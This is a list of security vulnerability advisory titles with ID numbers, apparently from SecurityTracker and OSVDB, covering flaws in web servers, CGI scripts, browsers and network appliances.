[1003368] AHG's 'search.cgi' Search Engine Input Validation Flaw Lets Remote Users Execute Arbitrary Commands on the Web Server
[1003358] SquirrelMail Web-based Mail Server Lets Remote Users Execute Arbitrary Code on the Server
[1003357] FormMail.pl Web-to-Email CGI Script Still Allows Unauthorized Users to Send Mail Anonymously (e.g., Send Spam)
[1003350] Tarantella Enterprise Server 'ttawebtop.cgi' Bug Discloses Files and Directories to Remote Users
[1003346] W3Perl Web Server Statistics Package Allows a Remote User to Cause Arbitrary Javascript to Be Executed When the Package is Used
[1003329] Caldera 'scoadminreg.cgi' Component of UnixWare Webtop Lets Local Users Execute Arbitrary Code with Root Privileges to Gain Root Access
[1003324] Netscape Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain
[1003323] Mozilla Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain
[1003322] Citrix NFuse Web Publishing Server Discloses List of Published Applications to Remote Users
[1003321] Cyberstop Web Server Can Be Crashed By Remote Users Sending URL Requests for MS-DOS Devices
[1003320] Comprehensive Web Programming API (CwpApi) May Disclose Files Located Outside of the Web Root Directory to Remote Users
[1003309] CGI Online Worldweb Shopping (COWS) E-Commerce System Discloses User Information and Order Data to Remote Users and Also Permits Cross-site Scripting Attacks
[1003291] Hellbent Java-based Web Server May Disclose Configuration Information to Remote Users In Certain Situations
[1003282] Avirt Gateway Web Proxy Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server with SYSTEM Level Privileges
[1003256] My Calendar Perl-based Web Calendar Flaw Allows Remote Users to Execute Arbitrary Code on the Web Server
[1003255] My Classifieds On-line Classified Advertising Script Has Flaw That Allows Remote Users to Execute Arbitrary Code on the Web Server
[1003254] Quiz Me! Testing Script May Allow Remote Users to Execute Arbitrary Code on the Web Server
[1003253] Mike's Vote CGI Survey Script Bug Allows Remote Users to Execute Arbitrary Code on the Web Server
[1003251] Sapporo Works 'BlackJumboDog' Web Proxy Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Host Running the Proxy
[1003246] Sambar Web Server Sample CGI Allows Remote Users to Crash the Web Server
[1003239] Python Language Implementation on Microsoft Windows Allows a Remote Server to Access Files on a Web Surfing User's PC
[1003228] Microsoft Windows Media Player Discloses Unique ID to Remote Users in the Default Configuration, Allowing Web Sites to Track Users
[1003222] ZBServer Pro Web Server Can Be Crashed By Remote Users Sending Long URL GET Requests Several Times
[1003220] Web Server 4D/eCommerce Discloses Files Located Anywhere on the Server to Remote Users
[1003219] Web Server 4D/eCommerce Can Be Crashed By Remote Users Sending a Few Long URL GET Requests
[1003210] Pi3Web HTTP Server Can Be Crashed By Remote Users Sending Long CGI Parameters
[1003175] Dino's Webserver Directory Traversal Flaw Lets Remote Users Obtain Files Located Anywhere on the Server
[1003173] EServ Web Server Discloses Password-Protected Files and Directories to Remote Users
[1003169] Allaire Forums Web Bulletin Board Authentication Flaw Lets Remote Users Impersonate Other Users on the Board
[1003156] iPlanet Web Server Publishing Feature Allows Remote Users to Conduct Brute Force Password Guessing Attempts
[1003155] iPlanet Web Server Can Be Crashed By Remote Users Sending a Certain Publishing Command
[1003152] BEA WebLogic Server Can Be Crashed By Remote Users Sending Multiple Requests for DOS Devices
[1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
[1003125] Hosting Controller Windows-based Web Hosting Management Software Lets Remote Users Establish Administrator Accounts and Upload and Execute Arbitrary Code on the Server
[1003124] Multiple Bugs in Savant Webserver Allow Certain Remote Requests to Cause Denial of Service Conditions and Other Requests to Be Processed Without Being Logged
[1003117] Geeklog Web-based Community Portal Software May Let a Remote User Obtain Administrative Privileges on the Application
[1003116] PHPFileExchange Web-Based File Storage System Has Access Control Bug That Allows Remote Users With Valid Accounts to Upload Files to Read-Only Directories
[1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
[1003103] Anti-Web HTTPD (awhttpd) Web Server Can Be Crashed By Local Users
[1003074] Cherokee Web Server Discloses Any File Located on the Web Server to Remote Users
[1003073] Oracle Application Server Web Cache Can Be Crashed By Remote Users Sending Certain GET Requests Containing NULL Characters or Period Characters
[1003072] Oracle Application Server Web Cache Installation File Permission Error Lets Local Users Obtain Elevated Privileges
[1003069] Vim Text Editor Backup File Configuration Errors May Let Remote Users View the Source Code of Web Scripts That Have Been Edited With the VIM Editor
[1003063] Lynx Web Browser Format String Flaw Lets Remote Web Sites (URLs) Execute Arbitrary Commands on the Host in a Certain Configuration
[1003061] Lynx Web Browser SSL Security Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks to Access Sensitive Information
[1003060] KDE Konqueror Web Browser SSL Security Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks to Access Sensitive Information
[1003056] AdStream Banner Management CGI System Calls Let Remote Users Execute Arbitrary Commands on the Web Server
[1003050] Microsoft Internet Explorer Web Browser Can Be Crashed By Malicious Image Source Tag Javascript Supplied By Remote Users
[1003046] AdRotate Pro Perl-based Banner Management Utility Has Input Validation Flaw That Lets Remote Users Modify the Underlying Database and May Let Remote Users Execute Arbitrary Code on the Web Server
[1003042] Microsoft Internet Explorer Web Browser SSL Security Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks to Access Sensitive Information
[1003039] Mozilla Web Browser Can Be Crashed By Malicious Image Source Tag Javascript Supplied By Remote Users
[1003024] Microsoft Internet Explorer (IE) Web Browser 'document.open()' Scripting Flaw Lets Remote Users Steal Cookies, Read Local Files, and Spoof Web Sites
[1003012] Novell NetWare Enterprise Web Server Discloses the Contents of Any File to Remote Users, Including the Console Password
[1003007] Webmin Web-Based System Management Tool Gives Remote Users Root Level Access
[1003001] Webmin Management Tool Lets Valid Remote Users View and Edit Files on the Web Server
[1002991] Manual.php Script for Displaying UNIX Man Pages Lets Remote Users Execute Arbitrary Code on the Web Server
[1002988] Tivoli SecureWay Policy Director WebSEAL Server Can Be Crashed By Remote Users Appending '%2e' to HTTP Requests
[1002984] Webglimpse Search Engine Software May Allow Remote Users to Execute Arbitrary Code on the Server
[1002973] Microsoft Internet Explorer (IE 6) Browser May Automatically and Silently Execute Arbitrary Code from a Remote Web Site When the User Views a Web Page or HTML-based E-mail
[1002970] ATPhttpd Web Server Can Be Crashed By Remote Users Sending Long URLs
[1002964] IBM WebSphere Discloses Administration Server 'Root' Password to Local Users
[1002941] CSVForm Perl Script Input Validation Bug Lets Remote Users Execute Arbitrary Code With the Privileges of the Web Server
[1002928] Kebi Webmail Server Gives Remote Users Access to Administrative Functions Via a 'Hidden' URL
[1002927] Lotus Domino With Web Server Has Denial Of Service Bug That Lets Remote Users Lock Databases or Cause the Service to Crash With Malformed URLs
[1002915] Microsoft Outlook Web Access for Exchange May Execute Remotely Supplied Scripts When a Recipient Views a Malicious E-mail Message
[1002880] Lotus Domino Secure Web Server Can Be Crashed By Remote Users
[1002871] PGPMail Perl Script Does Not Filter User Input and Lets Remote Users Execute Arbitrary Commands on the Web Server
[1002868] WoltLabs Burning Board PHP-based Forum Discloses the Web Root Directory Location
[1002857] Network Associates WebShield SMTP Anti-Virus Gateway Fails to Block BadTrans Virus Due to Errors in Processing the MIME Header
[1002838] Allaire's JRun Java Server Discloses JSP Source Code to Remote Users When Used As a Connector With Commercial Web Servers
[1002837] Allaire JRun Java Server Discloses Web Server Directory Contents to Remote Users Requesting URLs Containing '%3f.jsp'
[1002834] Sendpage.pl CGI Script Lets Remote Users Execute Commands on the Web Server
[1002827] Xitami Web Server Discloses Web Server Administrator Password to Local Users, Which Could Lead to Root Compromise
[1002821] iODBC Open DataBase Connectivity Library Buffer Overflow May Let Remote Users Execute Arbitrary Code When Used With a Web Server
[1002820] Microsoft Internet Explorer Allows Malicious Web Pages to Spoof Downloadable File Types And Execute Code on the User's Computer When Opened Directly from the Browser
[1002818] Oracle9iAS Web Cache Can Be Crashed By Remote Users Sending Malformed HTTP Content Length Header
[1002812] Red Hat Stronghold Secure Web Server Discloses Sensitive System Files to Remote Users
[1002806] SuSE Linux Susehelp CGI Scripts Allow Remote Users to Execute Arbitrary Commands With the Privileges of the Web Server
[1002805] Netscape Browser for MacOS Discloses HTML Web Form Password Contents to Local Users
[1002797] Opera Web Browser May Disclose Passwords Typed into an HTML Form to Local Users
[1002783] Thttpd Web Server Has a One Byte Buffer Overflow That Allows Remote Users to Execute Arbitrary Code
[1002778] Microsoft Internet Information Server (IIS) Lets Remote Users Create Bogus Web Log Entries
[1002777] Hypermail Web-based E-mail Archive Lets Remote Users Execute SSI Commands on the Server
[1002773] Titan Application Firewall for IIS Web Server Fails to Decode URLs, Letting Remote Users Bypass URL-based Firewall Restrictions
[1002770] Gallery Web Photo Gallery Software for PHPNuke Discloses Files on the Server to Remote Users
[1002759] Opera Web Browser May Disclose Web Pages, Cookies, and Links from a Separate Domain to a Remote Server Running Malicious Javascript Code
[1002753] NeoMail Web-based Mail Client Package for Sun Cobalt RaQ and Cube Appliances Contains Suidperl Vulnerability That Lets Remote Users Gain Root Privileges
[1002743] mini_httpd Web Server Discloses Password-Protected and Non-Readable Files to Remote Users
[1002742] thttpd Web Server Discloses Password-Protected and Non-Readable Files to Remote Users in Certain Configurations
[1002695] Red Hat Tux Kernel-based Web Server Can Be Crashed By Remote Users Sending Oversized Host Field
[1002669] Lotus Domino Web Server Default Navigation Protection Mechanisms Can Be Bypassed by Remote Users, Allowing Some Portions of the Database to be Viewed
[1002668] Lotus Domino Web Administrator Template Access Control Flaw Lets Remote Users Gain Some Web Administrator Privileges
[1002667] Web Crossing Discussion and Chat Software Uses Weak Session Authentication That Allows Remote Users to Hijack User Sessions
[1002660] Seth Leonard's Post It! CGI Script Meta-Character Filtering Hole Lets Remote Users Execute Arbitrary Shell Commands on the Web Server
[1002659] Seth Leonard's Book of Guests CGI Script Meta-Character Filtering Hole Lets Remote Users Execute Arbitrary Shell Commands on the Web Server
[1002640] RSA SecurID ACE/Agent Unicode Vulnerability Lets Remote Users View Files and Possibly Execute Programs on the WebID Server Without Authenticating
[1002637] Webalizer Log File Analyzer Cross-Site Scripting Hole Allows Remote Users to Cause Arbitrary But Trusted Code to Be Executed By Another User When Viewing Webalizer Reports
[1002615] Webmin Creates Insecure Temporary Files That Can Be Modified By Local Users to Cause Webmin to Execute Arbitrary Commands with Root Level Privileges
[1002602] Mountain Network Systems WebCart Lets Remote Users Execute Arbitrary Commands on the Web Server
[1002582] Oracle9iAS Web Cache Allows Remote Users to Execute Arbitrary Code or Cause the Caching Process to Exit or Hang
[1002560] Internet Explorer Sends Potentially Sensitive Web Browser Contents to Microsoft via the Network When an Error Occurs
[1002549] Novell GroupWise WebAccess Discloses Files to Remote Users
[1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
[1002541] Post-Nuke Web Portal Software Authentication Flaw Lets Remote Users Access User Accounts Without Requiring the Password
[1002540] Ipswitch's IMail Server's Web Calendaring Function Has Buffer Overflow That Lets Remote Users Execute Arbitrary Code with System Level Privileges
[1002526] Microsoft Internet Explorer (IE) Web Browser Has Multiple URL-related Flaws That May Allow for Remote Code Execution, Remote HTTP Request Generation, and Application of Incorrect Security Restrictions
[1002511] W3Mail Web Mail Front End Has Metacharacter Input Validation Flaw that Lets Authenticated Remote Users Execute Arbitrary Shell Commands on the Server
[1002505] ZorbStats PHP-based Web Statistics Generator Allows Remote Users to Execute Arbitrary Code on the Server
[1002504] Webodex PHP-based E-mail List Management Software Executes Remotely Supplied Code
[1002503] Gallery PHP-based Web Photo Gallery Software Permits Remote Users to Supply and Execute Arbitrary Code
[1002502] thatphpware PHP-based Web Portal Software Allows Remote Users to Execute Arbitrary Code
[1002501] SIPS PHP-based Web Log Tracking System Will Execute Remotely Supplied Arbitrary Code
[1002500] pSplash Web Portal Software Lets Remote Users Execute Arbitrary Code
[1002493] DarkPortal PHP-based Web Portal Lets Remote Users Supply and Execute Arbitrary Code
[1002480] BestWWWD Web Server Lets Remote Users Execute Shell Commands on the Server
[1002467] COM2001's Alexis Internet-enabled PBX Discloses Voice Mail Passwords When the Web Access Component is Used Over a Network
[1002462] CardBoard Greeting Card CGI Application Lets Remote Users Execute Arbitrary Commands on the Web Server
[1002460] H-Sphere Web Hosting Software Discloses Files on the System to Remote Users with Valid Web Management Accounts
[1002456] Microsoft Outlook Web Access Directory Validation Flaw Lets Remote Users Consume CPU Resources by Requesting Mail from Nested Folders
[1002444] Lotus Domino Web Server Discloses Internal Network Address to Remote Users
[1002442] XCache Web Caching Server Discloses Path Names for Web Documents to Remote Users
[1002437] IBM WebSphere Application Server Uses Predictable Session ID Cookies, Allowing Remote Users to Guess Session IDs and Hijack Web Sessions
[1002434] ICQ Web Portal Cross-Site Scripting Vulnerability May Allow Remote Users to Cause Arbitrary Code to Be Executed by a Target User's Browser via the ICQ Web Site
[1002427] Webdiscount.net's eshop Commerce System Lets Remote Users Execute Arbitrary Commands on the System and Gain Shell Access
[1002404] Textor's Listrec.pl Web Content Management CGI Script Allows Remote Users to Execute Code With the Privileges of the Web Server
[1002395] Cgiemail Web-based E-mail Remotely Executes Arbitrary Code With the Privileges of the Web Server
[1002393] Hotmail Web E-mail Service Allows Remote Users to Cause Malicious Javascript to be Executed by the Recipient's Browser, Potentially Stealing Authentication Cookies
[1002386] Mac OS X Discloses Directory Contents to Remote Users When Running a Web Server
[1002340] WEBsweeper Content Security Software's URL Restrictions Can Be Bypassed By Remote Users
[1002336] Outlook Web Access Discloses Global Address List to Remote Users
[1002331] Internet Security Systems RealSecure Intrusion Detection Misses '%u' Encoded Attacks Against Microsoft Web Servers
[1002330] Cisco Catalyst 6000 Intrusion Detection System Module Fails to Detect '%u' Encoding Obfuscation Attacks Against Microsoft Web Servers
[1002329] Dragon Sensor Intrusion Detection System Does Not Detect Certain Attacks Against Microsoft Web Servers
[1002327] Snort Network Intrusion Detection System Will Not Detect '%u' URL Encoding Attacks Against Microsoft Web Servers
[1002326] Cisco Secure Intrusion Detection System (NetRanger) Fails to Detect Certain Attacks Against Microsoft Web Servers
[1002325] Marconi ASX Series ATM Switches Allow Remote Users to Crash the Telnet Administrative Interface
[1002322] WebShield E-mail Scanner Lets Remote Users Get User-Level Operating System Access
[1002314] Basilix Web Mail Server Will Execute Commands Supplied By Remote Users
[1002297] Tripwire for Web Pages Discloses Information to Remote Users
[1002269] Microsoft Outlook Web Access with SSL Can Be Crashed by Remote Users
[1002259] Trend Micro Office Scan Has Remote Web Management CGI That Lets Remote Users View Arbitrary Files on the Server
[1002255] Trend Micro Virus Buster Has Remote Web Management CGI That Lets Remote Users View Arbitrary Files on the Server
[1002254] A-V Tronic's Inetserv Web Mail Server Buffer Overflow Vulnerabilities Let Remote Users Crash the System or Execute Arbitrary Code with System Level Privileges
[1002246] Cisco 600 Series DSL Routers (CBOS Operating System) Can Be Crashed By Remote Users Via Administrative Interface
[1002233] BadBlue Web Server Discloses PHP Source Code to Remote Users
[1002232] 4D Web Server Discloses All Files on the Drive to Remote Users
[1002212] Microsoft IIS Web Server Contains Multiple Vulnerabilities That Allow Local Users to Gain System Privileges and Allow Remote Users to Cause the Web Server to Crash
[1002210] Novell GroupWise WebAccess Discloses Directory Index Listings to Remote Users Instead of the Index.html File
[1002209] NetWare Enterprise Server Web Server for NetWare 5.x Discloses User Names, Group Names, and Other Information to Remote Users
[1002203] Webridge PX Application Suite Discloses Internal Information to Remote Users
[1002195] SIX Webboard Discloses Any World-Readable File on the Server to Remote Users
[1002192] Baltimore Technologies WEBsweeper Lets Remote Users Send Malicious Code That Will Bypass Content Security Restrictions
[1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
[1002181] Several Bugs in PHP-Nuke Let Remote Users Take Administrative Control of the Web Portal or Cause the Site to Crash
[1002161] Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users
[1002135] Roxen Web Server Discloses Files on the Server to Remote Users and May, in Certain Configurations, Let Remote Users Execute Any Program on the Server
[1002124] Microsoft Windows 98 Operating System Can Be Crashed When Running a Web Server or Other Servers And the AUX Device is Accessed By the Program
[1002101] Window Maker X11 Window Manager Contains a Buffer Overflow that May Execute Arbitrary Code or Crash When Viewing a Malicious Web Page or E-mail Message
[1002082] Sambar Web Server Lets Remote Users Modify Files on the Server
[1002074] Proxomitron Web Filtering Proxy Allows Remote Users to Conduct Cross-site Scripting Attacks and Cause Arbitrary Code to be Executed by the Proxomitron Users' Browser, Possibly Disclosing Cookies
[1002068] Tivoli SecureWay Policy Director WebSEAL Server Discloses Files on Multiple Web Servers to Remote Users
[1002038] Sambar Server's Web Server Lets Local Users Disclose Files Outside of the Documents Directory
[1002035] Un-CGI Web Form Preprocessor Discloses Files on the System to Remote Users and Executes Non-executable Files
[1002034] Caldera Docview Documentation Web Server Lets Local Users Gain Httpd User Account Privileges
[1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
[1001964] IBM's Net.Data Web Scripting Language May Disclose Sensitive SQL Query Parameters to Remote Users
[1001963] Opera Web Browser Can Be Crashed By a Malicious Web Server
[1001956] Xloadimage Used By Netscape Browser May Execute Arbitrary Code Specified By a Malicious Remote Web Server
[1001944] BasiliX Web Mail Server Lets Remote Users Read Files on the System
[1001934] Cobalt Cube WebMail Lets Remote Users Traverse Directories and Obtain Files on the Server
[1001915] LiteWebServer Discloses JSP Source Code to Remote Users
[1001912] Resin Web Server Lets Remote Users Cause Arbitrary Javascript to be Executed by Another User's Browser
[1001911] Lotus Domino Web Server Lets Remote Users Cause Arbitrary Javascript to be Executed by Another User's Browser
[1001904] vWebServer for Windows Discloses ASP Source Code to Remote Users and Can Be Crashed Remotely
[1001903] IBM WebSphere Java Application Server Lets Remote Users Cause Arbitrary Javascript to be Executed by Another User's Browser
[1001899] Another Buffer Overflow in TrendMicro's InterScan Web Manager Gateway Lets Remote Users Execute Arbitrary Code with System Level Privileges
[1001897] Citrix NFuse Web Application Discloses the Full Installation Path to Remote Users
[1001893] Another Buffer Overflow in GazTek ghttpd Web Server Lets Remote Users Execute Arbitrary Code on the Server
[1001873] Apple Mac OS Personal Web Sharing Can Be Crashed with Long Passwords from Remote Users
[1001870] Active Classifieds Web Software Lets Remote Users Run Arbitrary Code on the Server
[1001831] Perception LiteServe Web Server Discloses CGI Script Source Code to Remote Users
[1001818] Microsoft Internet Information Server (IIS) Web Server Discloses ASP Source Code When Installed on FAT-based Filesystem
[1001811] 1C:Arcadia Internet Store Web Commerce System Discloses Files to Remote Users and Lets Remote Users Crash the Application
[1001805] TrendMicro's InterScan Web Manager Gateway Lets Remote Users Obtain System-Level Access to the Server
[1001803] w3m Text-based Web Browser May Execute Arbitrary Code
[1001801] SurfControl's SuperScout Web Filter Fails to Block Packets Relayed Via Proxy Servers
[1001779] Tarantella Application Web Server Discloses Files on the Server to Remote Users
[1001772] GazTek ghttpd Web Server Executes Arbitrary Code Supplied By Remote Users
[1001748] ScreamingMedia's SiteWare Web Publishing System Lets Remote Users View Any Files on the Server
[1001743] Anonymizer Anonymous Web Browsing Service Fails to Block Some Javascript, Allowing Javascript to Disclose the Anonymous User's Information
[1001739] BiblioWeb Server Can Be Crashed By a Remote User Sending a Long URL
[1001737] WebStore Shopping Cart Allows Remote Users to Execute Commands on the Server
[1001730] Gmx.net Web-Based E-mail System Lets Remote Users Execute Arbitrary Code on the User's Browser
[1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
[1001712] Caldera's Volution Web-Based Management System May Permit a Rogue Volution System to Take Control of Volution Clients on the Network
[1001707] VirtualCatalog Commerce Application Discloses Script Source Code to Remote Users and Lets Remote Users Execute Certain Commands via the Web Server
[1001699] Microsoft Internet Explorer Web Browser May Allow Remote Users to Read Some Text Files on the Browser's Hard Drive
[1001696] Microsoft Exchange Server's Outlook Web Access (OWA) Lets Remote Users Execute Arbitrary Code on the OWA User's Web Browser
[1001686] Netscape Messenger E-mail Client Discloses Some User Information to Remote Web Sites
[1001680] ChatSpace (O'Reilly) WebBoard Lets Remote Users Execute Arbitrary Javascript Code
[1001676] WebTrends Enterprise Reporting Server Discloses Source Code of Scripts on the Web Server
[1001662] Acme.Serve Java-based Web Server Lets Remote Users Read All Files on the Server
[1001658] Internet Messaging Program (IMP) Web-based E-mail System Allows Local Users to Write Arbitrary Contents to Existing Files on the Server
[1001656] Cisco 11000 Series Content Service Switch Allows Remote Users to Gain Access to Web-Based Management Functions Without Authentication
[1001641] WebAvail's LinkMax2 ASP-based Link Indexing Script Lets Remote Users Access the Administrative Script Without Authentication
[1001630] TWIG Webmail Allows Authorized Remote Users to Make Unauthorized Modifications to Another User's Data on the Database Server
[1001629] Directory Pro CGI-based Web Directory Management Tool Lets Remote Users Obtain Files on the Server
[1001627] Webmin System Administration Tool May Allow Remote Users to Obtain the Webmin Password
[1001623] SpearHead's NetGAP Security Appliance Allows Remote Users to Bypass the Web Content Filtering Engine
[1001618] OmniHTTP Web Server Allows Remote Users to Obtain Source Code of PHP Scripts and to Cause the Server to Consume All CPU Cycles
[1001608] Beck IPC's IPC@CHIP Embedded Web Server Contains Multiple Flaws Allowing Remote Users to Crash the Server and Obtain Sensitive Information from the Server, Including Usernames and Passwords
[1001576] eEye Digital Security's SecureIIS Application Firewall for Microsoft Web Servers Fails to Filter Certain Web URL Characters, Allowing Remote Users to Bypass the SecureIIS Firewall
[1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
[1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method
[1001562] Microsoft Internet Explorer Allows Remote Web Sites to Cause a Different Web URL Address to Be Displayed in the Browser's Address Bar, Allowing Rogue Web Sites to Spoof the Browser and Masquerade as Different Web Sites
[1001561] Microsoft Internet Explorer Web Browser Fails To Validate Digital Certificates in Some Configurations, Allowing Rogue Secure Web Sites to Spoof the Browser and Masquerade as a Different Secure Web Site
[1001558] PHPSlash Lets Remote Administrators View Files on the Server Located Outside of the Web Document Root Directory
[1001555] OmniHTTPd Pro Web Server Can Be Crashed By Remote Users
[1001551] DCForum Web Messaging Board Software Lets Remote Users Gain DCForum Administrator Privileges and Execute Arbitrary Code on the Server
[1001541] iPlanet Web Server Allows Remote Users to Execute Arbitrary Code on the Server and to Crash the Server
[1001540] MacOS Personal Web Sharing Can Be Crashed By Remote Users
[1001538] Older Version of Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users
[1001530] Microsoft IIS Web Server Allows Remote Users to Execute Commands on the Server Due to CGI Decoding Error
[1001525] Earlier Version of LiteServe Web Server for Windows Can Be Crashed By Remote Users
[1001519] Zope Dynamic Web Content Management Tool May Allow Remote Users to Access Certain Unauthorized Data
[1001492] A1-Stats Web Server Traffic Monitoring Statistics Package Lets Remote Users View Files Anywhere on the Server and Overwrite the Contents of Some Existing Files
[1001491] MP3Mystic MP3 Web Server Lets Remote Users Browse Files Located Anywhere on the Server
[1001483] Microsoft IIS Web Server Lets Remote Users Restart the Web Server with Another Specially Crafted PROPFIND XML Command
[1001477] iScouter PHP-based Web Portal System Lets Remote Users Access Database Passwords
[1001462] Bugzilla Web-Based Software Bug Tracking Tool Allows Remote Users to Execute Arbitrary Shell Commands on the Server
[1001457] SAP R/3 Web Application Server Demo Allows Local Users to Gain Root Level Access
[1001455] BRS WebWeaver Web Server Allows Remote Users to Obtain Any File on the Server
[1001452] ICQ Web Front Plugin for the ICQ Chat Program Allows Remote Users to Crash the Web Server With Malformed Packets
[1001450] PerCal Web Calendar Software Allows Remote Users to View Files on the Server
[1001440] WebXQ Web Server From DataWizard Technologies Allows Remote Users to Access Files Outside of the Server's Web Root Directory
[1001429] Perl Web Server Lets Remote Users Access Files and Directories Outside of the Web Server's Web Root Directory
[1001425] NetCruiser Web Server Displays Physical Path Information For Certain URLs
[1001414] Viking Web Server Discloses Files Outside of the Web Root Directory to Remote Users Due to Relative Path Vulnerability
[1001413] WebCalendar Allows Remote Users to Execute PHP Commands on the Server Without Authentication
[1001410] SquirrelMail Web-Based Mail Software Allows Remote Users to Execute PHP Commands on the Server
[1001402] Microsoft IIS Web Server Can Be Effectively Shut Down By Certain Internal-Network Attacks When The Underlying OS Supports User Account Lockouts
[1001400] Opera Web Browser May Execute Files Selected for Download Instead of Prompting the User for Approval
[1001349] AnalogX's Simple Server:WWW Web Server Can Be Crashed By Remote Users
[1001348] iMatix's Xitami Web Server Allows Remote Users to Crash the Web Server
[1001345] Viking Server Discloses Files Outside of the Document Directory to Remote Web Users
[1001343] MyServer Java-based Web Server Can Be Crashed By Remote Users
[1001342] GoAhead Web Server Can Be Crashed By Remote Users
[1001338] iPlanet Web Server Allows Remote Users to Corrupt Data on the Server and May Allow Remote Users to Execute Arbitrary Code on the Server
[1001337] IBM's Domino Web Server May Disclose Physical Path Information to Remote Users
[1001332] DCScript's DCForum Web Messaging Board Software Allows Remote Users to Cause the Software to Execute Arbitrary Code
[1001305] IBM WebSphere NetCommerce Server Discloses File Path Names and Can Be Crashed By Remote Users
[1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
[1001296] MarkeTrend's nph-maillist.pl CGI Script Lets Remote Users Execute Commands on the Web Server
[1001290] Compaq Presario Computers May Allow Malicious Web Pages to Cause Arbitrarily Named Files to Be Written to the Hard Drive Without Authorization
[1001284] A Shared Library in Oracle's Application Server and Used by the iPlanet Web Server Allows the Web Server to be Crashed By Remote Users
[1001274] Netscape 4.76 Browser May Execute Arbitrary Javascript Code that Could Disclose Recently Visited Web URLs
[1001271] TalkBack CGI Script Discloses the TalkBack Administrator Password and Allows Remote Users to View Files on the Web Server
[1001248] Savant Web Server Can Be Crashed Remotely With Certain HTTP Requests
[1001234] Resin Web Servlet and Java Engine Discloses JavaBean Contents to Remote Users
[1001215] WebSPIRS CGI By SilverPlatter Allows Remote Users to View Files Outside of the Web Server's Root Directory
[1001212] CrazyWWWBoard CGI Allows a Remote User to Execute Arbitrary Code on the Web Server
[1001210] Microsoft Internet Explorer Allows Malicious Web Pages to Retrieve Files from the User's Computer
[1001206] Earlier Versions of BEA's WebLogic Web Server May Reveal Script Source Code
[1001195] IBM's WebSphere Commerce Suite and Application Server Disclose the Source Code for JavaServer Pages
[1001194] Sun's JavaServer Web Development Kit Allows Remote Users to Access Files Outside the Document Root Directory
[1001189] Infradig's Inframail Web Server Can Be Crashed Remotely Using Malformed POST Requests
[1001188] O'Reilly WebSite Pro's Remote Manager Service Can Be Crashed Via the Network
[1001187] Microsoft Internet Explorer Is Vulnerable to Malicious Web Pages That May Obtain the User's Exchange E-mail Messages and May Access Restricted Web Server Directory Listings
[1001169] Anaconda! Foundation Clipper Gives Remote Users Unauthorized Access to Files Anywhere on the Web Server
[1001161] WebLogic Web Server By BEA Systems Allows Remote Users to Browse Web Directories
[1001157] Pwc CGI Code May Execute Arbitrary Code Supplied Via the Web
[1001149] Nearly All of Compaq's Web-Enabled Management Software Inadvertently Acts As a Web Proxy Server, Allowing Web Surfers to Bypass Normal Proxy Server Filtering
[1001131] Gordano's NTMail Mail Server Web Services Can Be Crashed Remotely By Any User Sending a Long URL Request
[1001121] O'Reilly's WebSite Pro Contains A Vulnerability That Reveals the Physical Path of the Web Directory to Remote Users
[1001116] Microsoft Personal Web Server Contains An Old Internet Information Server (IIS) Vulnerability Allowing Unauthorized Directory Listings and Possible Code Execution For Remote Users
[1001108] FormMail.pl Web-to-Email CGI Script Allows Unauthorized Users to Send Mail (e.g., spam) Anonymously
[1001089] vBulletin Web-Based Bulletin Board Allows Remote Users to Execute Arbitrary Code on the Server
[1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
[1001078] INDEXU Web Portal Content Management System Allows Users to Obtain Administrator Access to the Management System
[1001077] Savant Web Server v3.0 Can Be Crashed Remotely With a Malformed Request
[1001066] Websweeper From Baltimore Technologies Can Be Crashed Remotely Because It Does Not Limit The Size of Web Requests
[1001050] Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User
[1000992] WhitSoft's SlimServe HTTPd Web Server Gives Users Remote Access to Files Outside of the Server's Main Directory
[1000983] PHP-Nuke Web Site Management Software Allows Unauthorized Commands to Be Executed
[1000945] BadBlue's Windows-Based Web Server Can Be Crashed Via the Network and May Display Full Path Names
[1000943] Thinking Arts ES.One Commerce Package Allows Unauthorized File and Directory Listings Outside of the Web Root Directory
[1000942] Resin Web Servlet and Java Engine Allows Unauthorized Access to Directories and Files Outside of the Web Root Directory
[1000941] Pi3Web Server Reveals Directory Path Information And May Execute Arbitrary Code
OSVDB - http://www.osvdb.org:
[96132] Huawei Tecal RH2285 V2 Web Interface Unspecified Authentication Bypass
[95878] Cisco Multiple Content Network / Video Delivery Products Web Framework Command Line Interface Remote Command Execution
[95622] Foscam FI8620 PTZ Camera Web Interface Open Directory Information Disclosure
[95583] Cisco Unified MeetingPlace Web Conferencing Crafted HTTP Request Handling Web Interface Access Restriction Bypass Unspecified Information Disclosure
[95199] Cisco Secure Access Control System (ACS) Web Interface Unspecified XSS
[95101] Dell iDRAC6 Web Interface testurls.html CLP Interface Manipulation
[94140] VLC Media Player Web Interface XML Services Remote Command Execution
[94139] VLC Media Player Web Interface XML Services XSS
[94054] Cisco Aironet Web Interface Default Admin Credentials
[93719] Ruckus ZoneDirector Controllers Admin Web Interface Unspecified Authentication Bypass
[93681] Siemens Scalance X200 IRT Switches Web Interface Unspecified Remote Command Execution
[93679] Octopussy Web Interface Multiple Unspecified Issues
[93634] AirLink GW-200 Web Interface Default Admin Credentials
[93466] Huawei VP9610 / VP9620 Web Interface Session Fixation
